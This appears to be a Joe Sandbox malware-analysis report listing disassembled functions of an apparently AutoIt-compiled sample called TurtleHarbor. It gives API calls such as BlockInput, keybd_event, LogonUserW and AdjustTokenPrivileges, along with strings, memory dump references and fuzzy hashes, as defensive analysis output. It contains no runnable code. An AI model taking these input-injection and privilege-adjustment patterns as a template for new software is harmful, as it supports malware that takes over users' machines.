AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00374F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00374F5C
FreeSid.ADVAPI32(?), ref: 00374F6C

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: af70f5351e5228533dcb6d2cf9125acd6b2049b479a92d1673d63f9d5f1d0f8c
Instruction ID: fa2685ad6d79b10612f6bce4f504d8578cd25c18995ba6350b1927fda8a8bfbb
Opcode Fuzzy Hash: af70f5351e5228533dcb6d2cf9125acd6b2049b479a92d1673d63f9d5f1d0f8c
Instruction Fuzzy Hash: D3F04975A1130CBFDF04DFE0DD89AAEBBBCEF08301F4044A9A901E2180E7346A048B50

Function 00371AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00371B01
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00371B14

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 5827370e2133eaee9280367213190b4c6bd2b7d40c87184d79aef19aa1fc7e74
Instruction ID: f18b271c6ba5be873add2cbf28b10ee5b1c0ae7f4cc27e6df3aebc865231fa23
Opcode Fuzzy Hash: 5827370e2133eaee9280367213190b4c6bd2b7d40c87184d79aef19aa1fc7e74
Instruction Fuzzy Hash: AFF0497290420DABDB15CFA4C805BFE7BB8FF04315F00804AF95996292D3799615DF94

Function 0037A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00389B52,?,003A098C,?), ref: 0037A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00389B52,?,003A098C,?), ref: 0037A6EC

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 9208d68cc56aa46f46e502157d76dc09753a9fb34ee7519535ad2c080984821f
Instruction ID: c4ac6408cd5e09b04cf1496f08008f38961c3049c3879d4e683f0ac7febd4a2d
Opcode Fuzzy Hash: 9208d68cc56aa46f46e502157d76dc09753a9fb34ee7519535ad2c080984821f
Instruction Fuzzy Hash: 6AF0A73550422DBBDB22AFA4CC48FEA77ACFF09761F008155B918D6181D6309940CBE1

Function 00368DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00368F27), ref: 00368DFE
CloseHandle.KERNEL32(?,?,00368F27), ref: 00368E10

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 35466baa42619b34b29de61cea0f26d4907368d198d9881cada23195a3027193
Instruction ID: f0641206613ae6a312a15068e90cd8e5875b7d0ecb80eabb0389f696a778ff24
Opcode Fuzzy Hash: 35466baa42619b34b29de61cea0f26d4907368d198d9881cada23195a3027193
Instruction Fuzzy Hash: 3DE0EC76014610EFEB2B2B60EC49E777BADEF04310F14892DF49A844B4DB62ACE0DB50

Function 0033A385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000FFFF,00338F87,0000FCD7,?,?,00000001), ref: 0033A38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0033A393

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f4b57b22e34add9cbae6e5c81988f3407ba23cb0c22532c47a2a2cd0f109d716
Instruction ID: d82bd0bbd9576a48d7e969e352ff6a1075eaf5e7a4bd819ab1f20742a096b102
Opcode Fuzzy Hash: f4b57b22e34add9cbae6e5c81988f3407ba23cb0c22532c47a2a2cd0f109d716
Instruction Fuzzy Hash: 5EB09235064208ABCE462B91EC19B883F6CEB46BA2F004010F64D440A0CBA254508A91

Function 003845D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 003845F0

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 0159551afd2b6b9a98089ced88e734c5d11118ff449ced7edb590d9a0eb105cc
Instruction ID: cdc8b8e255e1f896d75e569f2b331225deecbea834c8dcfdc187228580fc4d0b
Opcode Fuzzy Hash: 0159551afd2b6b9a98089ced88e734c5d11118ff449ced7edb590d9a0eb105cc
Instruction Fuzzy Hash: EAE0DF312002069FC702BF99E800A8AF7ECEF99760F00801AFC09DB711DA70E9408BA0

Function 003751E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00375205

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 47b0d1c61207ac42e983231248e7f251e92c8a0fbfe71fdf2be02e0c773b7c02
Instruction ID: 074b7dc1908bb496fb45c2fccf9c0e39f217c28575b290601dcea704f46564ac
Opcode Fuzzy Hash: 47b0d1c61207ac42e983231248e7f251e92c8a0fbfe71fdf2be02e0c773b7c02
Instruction Fuzzy Hash: 8AD01CA4262A0AA8ECBE03248A0FF360208A3027C2FC5C249704AC90C3A8D86882A421

Function 00369369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00368FA7), ref: 00369389

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 041c38f61ce124f5c74bc2dc8b65f3426c804de9ebdc5132faa1bfe0ceacbf13
Instruction ID: efc6eb629b1bc2e641e5ccf211f7f2f027af3bc2e2ffbd52d0ff5fd4f0df32fb
Opcode Fuzzy Hash: 041c38f61ce124f5c74bc2dc8b65f3426c804de9ebdc5132faa1bfe0ceacbf13
Instruction Fuzzy Hash: D2D05E322A050EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A0C775E835AB60

Function 00350722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00350734

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 18dee2495e5b915187a10d0dc227d4d1ea0a6e81e925f15af13a7e13acfd4b1f
Instruction ID: 45fffa43d510e14b03e9d5d3532e4d3be0daf7086f3c99c307ce7980b2696766
Opcode Fuzzy Hash: 18dee2495e5b915187a10d0dc227d4d1ea0a6e81e925f15af13a7e13acfd4b1f
Instruction Fuzzy Hash: E4C04CF180010DDBCB0ADBA0DA88EFE77BCAB05305F100455A545B3150D7749B448A71

Function 0033A354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0033A35A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1cb070e75503d3f64971546712a9362eb2e9d371601da721349bf5cc52fe4795
Instruction ID: 2b16bd7263f1ca52bd4c8efeb22e1560daad18fd6b498dae842034321dfeb6e3
Opcode Fuzzy Hash: 1cb070e75503d3f64971546712a9362eb2e9d371601da721349bf5cc52fe4795
Instruction Fuzzy Hash: 8AA0223002020CFBCF022F82FC08888BFACEB023E0F008020F80C00032CB33A8208AC0

Function 00387EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00387F45
DeleteObject.GDI32(00000000), ref: 00387F57
DestroyWindow.USER32 ref: 00387F65
GetDesktopWindow.USER32 ref: 00387F7F
GetWindowRect.USER32(00000000), ref: 00387F86
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003880C7
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003880D7
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0038811F
GetClientRect.USER32(00000000,?), ref: 0038812B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00388165
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00388187
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0038819A
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003881A5
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003881AE
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003881BD
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003881C6
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003881CD
GlobalFree.KERNEL32(00000000), ref: 003881D8
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003881EA
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003A3C7C,00000000), ref: 00388200
GlobalFree.KERNEL32(00000000), ref: 00388210
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00388236
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00388255
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00388277
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00388464

Strings

static, xrefs: 0038815F, 003882B6
, xrefs: 003883EA
DISPLAY, xrefs: 003882C7
AutoIt v3, xrefs: 00388117

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: b63621ccf9dc63e6fbe711db5769ed554664133c5ec1efc3707493f2e3c8479c
Instruction ID: 4a5744a47f5a8c3ea5a9c2fce8765584d707db7405ae1d2b4c26e4ba7feb7c7c
Opcode Fuzzy Hash: b63621ccf9dc63e6fbe711db5769ed554664133c5ec1efc3707493f2e3c8479c
Instruction Fuzzy Hash: 58028E71900205EFDB1AEFA4DC89EAE7BBDFB49310F148559F905AB2A1DB309D41CB60

Function 00393BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,003A0980), ref: 00393C65
IsWindowVisible.USER32(?), ref: 00393C89

Strings

CHECK, xrefs: 00393EAB
ISENABLED, xrefs: 00393CA9
TABRIGHT, xrefs: 00393CDB
UNCHECK, xrefs: 00393EC1
GETLINE, xrefs: 00393FD9
HIDEDROPDOWN, xrefs: 00393D3E
SENDCOMMANDID, xrefs: 00394018
TABLEFT, xrefs: 00393CC5
ISVISIBLE, xrefs: 00393C75
CURRENTTAB, xrefs: 00393CFB
ISCHECKED, xrefs: 00393E77
EDITPASTE, xrefs: 00393F9D
GETSELECTED, xrefs: 00393EE1
GETCURRENTLINE, xrefs: 00393F2B
SELECTSTRING, xrefs: 00393E44
ADDSTRING, xrefs: 00393D54
SETCURRENTSELECTION, xrefs: 00393DF4
FINDSTRING, xrefs: 00393DB4
SHOWDROPDOWN, xrefs: 00393D1E
DELSTRING, xrefs: 00393D87
GETCURRENTSELECTION, xrefs: 00393E21
GETLINECOUNT, xrefs: 00393F04
GETCURRENTCOL, xrefs: 00393F66

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 6891c5157bf0a9e82335d503ffd49098a0cd44061e193929d5d08913ce3f3b03
Instruction ID: 4a6b448e1bf00f85a42b34e2aa93519c76294c3764305d012e16701256164fbe
Opcode Fuzzy Hash: 6891c5157bf0a9e82335d503ffd49098a0cd44061e193929d5d08913ce3f3b03
Instruction Fuzzy Hash: 40D16F742142058BCF1BEF50C4A1EAAB7A5EF95354F14885CF8465F3A2DB31EE4ACB81

Function 0039ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0039AC55
GetSysColorBrush.USER32(0000000F), ref: 0039AC86
GetSysColor.USER32(0000000F), ref: 0039AC92
SetBkColor.GDI32(?,000000FF), ref: 0039ACAC
SelectObject.GDI32(?,?), ref: 0039ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 0039ACE6
GetSysColor.USER32(00000010), ref: 0039ACEE
CreateSolidBrush.GDI32(00000000), ref: 0039ACF5
FrameRect.USER32(?,?,00000000), ref: 0039AD04
DeleteObject.GDI32(00000000), ref: 0039AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 0039AD56
FillRect.USER32(?,?,?), ref: 0039AD88
GetWindowLongW.USER32(?,000000F0), ref: 0039ADB3

Part of subcall function 0039AF18: GetSysColor.USER32(00000012), ref: 0039AF51
Part of subcall function 0039AF18: SetTextColor.GDI32(?,?), ref: 0039AF55
Part of subcall function 0039AF18: GetSysColorBrush.USER32(0000000F), ref: 0039AF6B
Part of subcall function 0039AF18: GetSysColor.USER32(0000000F), ref: 0039AF76
Part of subcall function 0039AF18: GetSysColor.USER32(00000011), ref: 0039AF93
Part of subcall function 0039AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0039AFA1
Part of subcall function 0039AF18: SelectObject.GDI32(?,00000000), ref: 0039AFB2
Part of subcall function 0039AF18: SetBkColor.GDI32(?,00000000), ref: 0039AFBB
Part of subcall function 0039AF18: SelectObject.GDI32(?,?), ref: 0039AFC8
Part of subcall function 0039AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0039AFE7
Part of subcall function 0039AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0039AFFE
Part of subcall function 0039AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0039B013

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 8ebbc25c2e3fc41a544df6f69d0bae03ab8d67c7dcc5eac49ea9624ad5d772a0
Instruction ID: cc982f667a3117776e2857b95133d0734b69c4e4aae0b0edcfe8c6f15112f9a9
Opcode Fuzzy Hash: 8ebbc25c2e3fc41a544df6f69d0bae03ab8d67c7dcc5eac49ea9624ad5d772a0
Instruction Fuzzy Hash: 2DA17C72408701AFDB1A9F64DC08A6B7BADFF8A321F100B19F962961E0D731D944CF92

Function 003227FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00330FE6: std::exception::exception.LIBCMT ref: 0033101C
Part of subcall function 00330FE6: __CxxThrowException@8.LIBCMT ref: 00331031

__wcsnicmp.LIBCMT ref: 0032286A
__wcsnicmp.LIBCMT ref: 0032287E
__wcsnicmp.LIBCMT ref: 00322896
__wcsnicmp.LIBCMT ref: 003228AE
__wcsnicmp.LIBCMT ref: 003228C6
__wcsnicmp.LIBCMT ref: 003228DE
__wcsnicmp.LIBCMT ref: 003228F6
__wcsnicmp.LIBCMT ref: 0032290A
__wcsnicmp.LIBCMT ref: 00322948
__wcsnicmp.LIBCMT ref: 0032295C
__wcsnicmp.LIBCMT ref: 00322970
__wcsnicmp.LIBCMT ref: 00322984

Strings

#ce, xrefs: 0032297E
#OnAutoItStartRegister, xrefs: 003228A8
#include-once, xrefs: 003228C0
#comments-start, xrefs: 003228F0, 00322942
", xrefs: 0035FB89
#requireadmin, xrefs: 00322890
#cs, xrefs: 00322904, 00322956
#include, xrefs: 003228D8
', xrefs: 0035FB9F
#notrayicon, xrefs: 00322878
Unterminated group of comments, xrefs: 0035FCFA
#pragma compile, xrefs: 00322864
Bad directive syntax error, xrefs: 0035FBD3, 0035FBF0
Cannot parse #include, xrefs: 0035FCE5
#comments-end, xrefs: 0032296A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 2660009612-1645009161
Opcode ID: 8397265f202acea259cad8d75632856e227e91d74d2f40886ff1e56ff0ef2d8f
Instruction ID: 2270109d995b4a930e3b9e073136a210284987c688a6865a41e0d263b5ccec87
Opcode Fuzzy Hash: 8397265f202acea259cad8d75632856e227e91d74d2f40886ff1e56ff0ef2d8f
Instruction Fuzzy Hash: EFA18B31A00219BBCB27AF60EC82FAF7778AF45740F004128FC05AA2A2EB71DA55D750

Function 00387B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00387BC8
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00387C87
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00387CC5
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00387CD7
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00387D1D
GetClientRect.USER32(00000000,?), ref: 00387D29
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00387D6D
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00387D7C
GetStockObject.GDI32(00000011), ref: 00387D8C
SelectObject.GDI32(00000000,00000000), ref: 00387D90
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00387DA0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00387DA9
DeleteDC.GDI32(00000000), ref: 00387DB2
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00387DDE
SendMessageW.USER32(00000030,00000000,00000001), ref: 00387DF5
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00387E30
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00387E44
SendMessageW.USER32(00000404,00000001,00000000), ref: 00387E55
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00387E85
